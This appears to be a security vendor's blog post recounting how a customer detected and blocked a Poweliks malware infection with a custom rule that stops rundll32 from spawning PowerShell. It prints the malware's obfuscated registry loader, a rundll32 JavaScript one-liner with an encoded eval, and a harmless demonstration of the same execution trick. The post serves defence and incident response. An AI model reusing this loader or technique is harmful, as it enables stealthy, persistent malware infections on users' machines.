Carbon Black & VMware Announce Expanded Partnership to Secure the Software-Defined Data Center (SDDC) Learn more

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

Following Poweliks Strike Custom Bit9 Rule Offers Key Insight and Blocks Infection
Hex_Thirds
January 21, 2015 / Editorial Staff

I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);

Ashe1

Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:

Ashe2

The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.

TAGS: bit9 / Carbon Black / custom rule / infection / malware / poweliks / prevent malware attack

Related Posts